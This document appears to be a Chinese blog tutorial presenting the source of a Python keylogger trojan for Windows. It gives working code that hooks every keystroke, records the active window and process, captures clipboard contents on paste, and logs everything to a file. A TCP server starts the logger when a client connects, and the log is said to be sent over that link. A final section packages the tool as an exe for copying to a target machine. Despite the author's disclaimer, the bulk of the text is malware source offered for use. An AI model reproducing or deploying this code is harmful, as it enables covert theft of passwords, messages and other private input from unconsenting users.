Python简单监控键盘输入的木马实现

由于文章制作的木马没有隐藏，实现的功能简单，没有危险性，故将木马开源，大神勿笑。请勿进行非法木马改造。

一，所需python库
木马目标运行环境为windows。使用的python类库为
pyHook(获取用户行为，安装提示见本人其他博文)
pywin32(提供windows下的python接口,比如pythoncom)
py2exe(由于木马目标运行环境为windows，该类库可以将python程序打包为exe程序，可以在没有安装python的windows中使用)
二，实现原理
1，TCP服务器和TCP客户端的信息交流原理及代码，见本人博客《python取代netcat第一步》http://blog.csdn.net/greepex/article/details/72823546
将其中的TCP服务端代码(while True)修改：

while True:      client, addr=server.accept()      print "[*]Accepted connection from:%s:%d"%(addr[0], addr[1])            #挂起客户端，处理传入数据    client_handler = threading.Thread(target=handle_client,args=(client,))    #挂起键盘监听程序    key_handler = threading.Thread(target=kl.main, args=())    key_handler.start()    client_handler.start() 

还有一部分修改内容是将message.txt中存储的内容send，这里就不多说了。
2，实现对键盘的一个监听功能：

# -*- coding: utf-8 -*-from ctypes import *import pythoncomimport pyHookimport win32clipboarduser32 = windll.user32kernel32 = windll.kernel32psapi = windll.psapicurrent_window = Nonedef get_current_process():    # 获取最上层的窗口句柄    hwnd = user32.GetForegroundWindow()    # 获取进程ID    pid = c_ulong(0)    user32.GetWindowThreadProcessId(hwnd, byref(pid))    # 将进程ID存入变量中    process_id = "%d" % pid.value    # 申请内存    executable = create_string_buffer("\x00" * 512)    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)    psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)    # 读取窗口标题    windows_title = create_string_buffer("\x00" * 512)    length = user32.GetWindowTextA(hwnd, byref(windows_title), 512)    # 存入本地的一个message.txt文件中    with open("message.txt","ab") as f:        f.write("\n")        f.write("[ PID:%s-%s-%s]\n" % (process_id, executable.value, windows_title.value))        f.write("\n")    # 关闭handles    kernel32.CloseHandle(hwnd)    kernel32.CloseHandle(h_process)# 定义击键监听事件函数def KeyStroke(event):    global current_window    # 检测目标窗口是否转移(换了其他窗口就监听新的窗口)    if event.WindowName != current_window:        current_window = event.WindowName        # 函数调用        get_current_process()    # 检测击键是否常规按键（非组合键等）    if event.Ascii > 32 and event.Ascii < 127:        with open("message.txt","ab") as f:            f.write(chr(event.Ascii))    else:        # 如果发现Ctrl+v（粘贴）事件，就把粘贴板内容记录下来        if event.Key == "V":            win32clipboard.OpenClipboard()            pasted_value = win32clipboard.GetClipboardData()            win32clipboard.CloseClipboard()            with open("message.txt","ab") as f:                f.write("[PASTE]-%s" % (pasted_value))        else:            with open("message.txt","ab") as f:                f.write("[%s]" % event.Key)    # 循环监听下一个击键事件    return Truedef main():    # 创建并注册hook管理器    kl = pyHook.HookManager()    kl.KeyDown = KeyStroke    # 注册hook并执行    kl.HookKeyboard()    pythoncom.PumpMessages()

三，将python程序打包为exe文件
这一步有很多教程，这里取最为精简的：
1，在需要变为可执行文件的脚本根目录下创建”setup.py”文件，并在其中写入：

from distutils.core import setup import py2exesetup(console=["脚本名字.py"])

在setup.py的目录下打开cmd，并输入：

python setup.py py2exe

运行截图：

在目录下会出现两个文件:build和dist
其中build是中间文件，可以删除。
dist为结果文件，其中有可执行程序。
将dist拷贝到需要的目标服务器中，可以直接运行其中的可执行程序
参考文章：
[1]http://blog.csdn.net/greepex/article/details/72823546